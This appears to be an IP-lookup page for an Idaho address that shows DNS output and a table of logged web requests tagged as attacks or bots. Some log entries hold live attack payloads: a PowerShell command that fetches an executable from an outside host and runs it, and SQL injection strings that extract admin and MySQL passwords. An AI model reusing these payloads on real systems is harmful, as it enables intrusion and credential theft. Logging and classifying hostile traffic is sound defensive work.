City: Twin Falls
Region: Idaho
Country: United States
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 160.3.55.59
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14480
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;160.3.55.59. IN A
;; AUTHORITY SECTION:
. 322 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2020080604 1800 900 604800 86400
;; Query time: 18 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Aug 07 07:23:58 CST 2020
;; MSG SIZE rcvd: 11559.55.3.160.in-addr.arpa domain name pointer 160-3-55-59.cpe.sparklight.net.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
59.55.3.160.in-addr.arpa name = 160-3-55-59.cpe.sparklight.net.
Authoritative answers can be found from:| IP | Type | Details | Datetime |
|---|---|---|---|
| 156.219.69.226 | attack | 156.219.69.226 - - [19/Apr/2019:04:36:01 +0800] "GET /wp-login.php HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 156.219.69.226 - - [19/Apr/2019:04:36:03 +0800] "GET /wp-login.php HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 156.219.69.226 - - [19/Apr/2019:04:36:03 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 156.219.69.226 - - [19/Apr/2019:04:36:03 +0800] "GET / HTTP/1.1" 200 10278 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" |
2019-04-19 04:38:18 |
| 118.25.71.65 | attack | 118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 301 194 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
118.25.71.65 - - [19/Apr/2019:15:56:16 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start%20C:/Windows/temp/rdoromzcvnzisoj23580.exe HTTP/1.1" 404 232 "http://118.25.52.138:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','C:/Windows/temp/rdoromzcvnzisoj23580.exe');start C:/Windows/temp/rdoromzcvnzisoj23580.exe" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-19 15:56:51 |
| 159.203.169.16 | bots | 端口扫描工具 159.203.169.16 - - [20/Apr/2019:04:41:30 +0800] "GET / HTTP/1.0" 200 24600 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" |
2019-04-20 05:08:16 |
| 115.209.249.243 | bots | 115.209.249.243 - - [19/Apr/2019:12:02:05 +0800] "GET /index.php/2018/11/12/time_cook_2018_11_12_en/ HTTP/1.1" 200 34515 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36" 115.209.249.243 - - [19/Apr/2019:12:02:16 +0800] "GET /index.php/2018/09/30/google_2018_09_30_cn/ HTTP/1.1" 200 40499 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36" 115.209.249.243 - - [19/Apr/2019:12:02:44 +0800] "GET /index.php/2018/09/30/google_2018_09_30_cn/ HTTP/1.1" 200 40499 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36" |
2019-04-19 12:40:00 |
| 183.129.198.99 | botsattack | 183.129.198.99 - - [22/Apr/2019:12:20:12 +0800] "\\x16\\x03\\x01\\x00\\x82\\x01\\x00\\x00~\\x03\\x01\\x5C\\xBD@\\xE9\\x90\\xE7\\xEBu\\xDA\\x0B\\xE1\\x9Ed\\xAB\\xEA@K\\x9C\\xC4\\x18n\\x05 \\xD2\\xB4\\xDD\\x87\\xEF\\xAD\\xA3\\x89\\xBF O1&\\xFE\\xF5\\xCEA\\xBB\\x22U\\xBC\\xFF\\xC0\\x05\\xC9\\x8Dr\\x8E\\x99J\\xD6\\x00\\xFB;\\xE7\\x80\\xAB\\xF9\\x10\\xA05\\xFF\\x00\\x1C\\xC0\\x14\\xC0\\x13\\x009\\x003\\x005\\x00/\\xC0" 400 182 "-" "-" 183.129.198.99 - - [22/Apr/2019:12:20:12 +0800] "\\x16\\x03\\x01\\x00b\\x01\\x00\\x00^\\x03\\x01\\x5C\\xBD@\\xE9PJ\\xA5\\xFAl\\x11\\x90\\xD1/`\\xD7\\x98\\xFF(\\x08\\x85\\xF6\\xDF\\xFC\\xF7\\xF3\\xA5\\x19P)\\xA7\\xF1m\\x00\\x00\\x1C\\xC0\\x14\\xC0\\x13\\x009\\x003\\x005\\x00/\\xC0" 400 182 "-" "-" |
2019-04-22 12:20:43 |
| 14.17.3.65 | attack | 管理员账户攻击检测 14.17.3.65 - - [18/Apr/2019:07:03:49 +0800] "GET /administrator/index.php HTTP/1.1" 404 480 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13G35 QQ/6.5.3.410 V1_IPH_SQ_6.5.3_1_APP_A Pixel/750 Co re/UIWebView NetType/2G Mem/117" |
2019-04-18 08:10:32 |
| 111.183.231.29 | attackproxy | 伪装爬虫攻击 111.183.231.29 - - [23/Apr/2019:06:02:57 +0800] "HEAD / HTTP/1.1" 200 328 "http://118.24.13.245" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" 111.183.231.29 - - [23/Apr/2019:06:02:57 +0800] "HEAD /alipay.html HTTP/1.1" 404 140 "http://118.24.13.245/alipay.html" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" 111.183.231.29 - - [23/Apr/2019:06:02:57 +0800] "HEAD /88888888 HTTP/1.1" 404 140 "http://118.24.13.245/88888888" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" 111.183.231.29 - - [23/Apr/2019:06:02:57 +0800] "GET /88888888 HTTP/1.1" 404 446 "http://118.24.13.245/88888888" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" |
2019-04-23 08:09:54 |
| 203.208.60.97 | bots | Googlebot,中国谷歌 |
2019-04-19 16:45:34 |
| 116.255.173.35 | attack | 116.255.173.35 - - [15/Apr/2019:22:39:33 +0000] "GET / HTTP/1.1" 200 138808 "http://hzsanren.com/" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.173.35 - - [15/Apr/2019:22:39:34 +0000] "POST //data/cache/asd.php HTTP/1.1" 404 15599 "http://hzsanren.com//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 116.255.173.35 - - [15/Apr/2019:22:39:34 +0000] "POST //config/AspCms_Config.asp HTTP/1.1" 403 20121 "http://hzsanren.com//config/AspCms_Config.asp" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-16 08:05:06 |
| 37.49.224.79 | bots | 37.49.224.79 - - [22/Apr/2019:11:48:41 +0800] "GET /check-ip/61.160.195.187 HTTP/1.1" 200 55632 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" 37.49.224.79 - - [22/Apr/2019:11:48:41 +0800] "GET /check-ip/203.208.60.97 HTTP/1.1" 200 59805 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" 37.49.224.79 - - [22/Apr/2019:11:48:42 +0800] "GET /check-ip/113.4.133.2 HTTP/1.1" 200 52944 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" 37.49.224.79 - - [22/Apr/2019:11:48:43 +0800] "GET /check-ip/113.237.176.72 HTTP/1.1" 200 54495 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" 37.49.224.79 - - [22/Apr/2019:11:48:44 +0800] "GET /check-ip/142.93.214.167 HTTP/1.1" 200 53059 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" |
2019-04-22 11:49:17 |
| 61.160.195.187 | attack | 61.160.195.187 - - [21/Apr/2019:06:24:39 +0800] "GET /plus/recommend.php?action=&aid=1&_FILES%5Btype%5D%5Btmp_name%5D=%5C%27%20or%20mid=@%60%5C%27%60%20/*!50000union*//*!50000select*/1,2, 3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C%27%60+&_FILES%5Btype%5D%5Bname%5D=1.jpg&_FILES%5Btype%5D%5Btype%5D=application/octet-strea m&_FILES%5Btype%5D%5Bsize%5D=4294 HTTP/1.1" 404 3409 "-" "-" 61.160.195.187 - - [21/Apr/2019:06:24:39 +0800] "GET /plus/recommend.php?aid=1&_FILES%5Btype%5D%5Bname%5D&_FILES%5Btype%5D%5Bsize%5D&_FILES%5Btype%5D%5Btype%5D&_FILES%5Btype%5D%5Btmp_name %5D=aa%5C'and+char(@%60'%60)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,Host,0x7C,user,0x3a,password,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20mysql.%60us er%60%23 HTTP/1.1" 404 538 "-" "-" |
2019-04-21 06:55:34 |
| 52.5.70.31 | spambots | 52.5.70.31 - - [22/Apr/2019:18:27:34 +0800] "GET /index.php/2019/04/19/xiaomi_2019_04_19_en/ HTTP/1.1" 200 13454 "-" "Grammarly/1.0 (http://www.grammarly.com)" |
2019-04-22 18:28:24 |
| 113.89.0.55 | bots | 113.89.0.55 - - [22/Apr/2019:14:01:01 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.0.55 - - [22/Apr/2019:14:01:01 +0800] "GET / HTTP/1.1" 200 10286 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.0.55 - - [22/Apr/2019:14:01:03 +0800] "HEAD /aboutus HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.0.55 - - [22/Apr/2019:14:01:03 +0800] "GET /aboutus HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.0.55 - - [22/Apr/2019:14:01:03 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 113.89.0.55 - - [22/Apr/2019:14:01:04 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" |
2019-04-22 14:01:42 |
| 222.186.10.54 | attack | 222.186.10.54 - - [23/Apr/2019:03:56:16 +0800] "POST //plus/e7xue.php HTTP/1.1" 404 513 "http://www.eznewstoday.com//plus/e7xue.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 222.186.10.54 - - [23/Apr/2019:03:56:17 +0800] "POST //plus/date.php HTTP/1.1" 404 512 "http://www.eznewstoday.com//plus/date.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 222.186.10.54 - - [23/Apr/2019:03:56:17 +0800] "POST //seo.php HTTP/1.1" 404 506 "http://www.eznewstoday.com//seo.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 222.186.10.54 - - [23/Apr/2019:03:56:17 +0800] "POST //tapic.php HTTP/1.1" 404 508 "http://www.eznewstoday.com//tapic.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 222.186.10.54 - - [23/Apr/2019:03:56:17 +0800] "POST //vedioes.php HTTP/1.1" 404 510 "http://www.eznewstoday.com//vedioes.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 222.186.10.54 - - [23/Apr/2019:03:56:17 +0800] "POST //Dom/Images/check.asp HTTP/1.1" 404 519 "http://www.eznewstoday.com//Dom/Images/check.asp" "Mozilla/4.0 (compatible; MSIE 9.0; Window s NT 6.1)" |
2019-04-23 04:50:57 |
| 79.127.127.253 | attack | php数据库攻击 79.127.127.253 - - [18/Apr/2019:16:08:43 +0800] "GET /muieblackcat HTTP/1.1" 301 194 "-" "-" 79.127.127.253 - - [18/Apr/2019:16:08:44 +0800] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "-" 79.127.127.253 - - [18/Apr/2019:16:08:45 +0800] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "-" 79.127.127.253 - - [18/Apr/2019:16:08:45 +0800] "GET //pma/scripts/setup.php HTTP/1.1" 301 194 "-" "-" 79.127.127.253 - - [18/Apr/2019:16:08:47 +0800] "GET //myadmin/scripts/setup.php HTTP/1.1" 301 194 "-" "-" 79.127.127.253 - - [18/Apr/2019:16:08:47 +0800] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 301 194 "-" "-" |
2019-04-18 16:10:30 |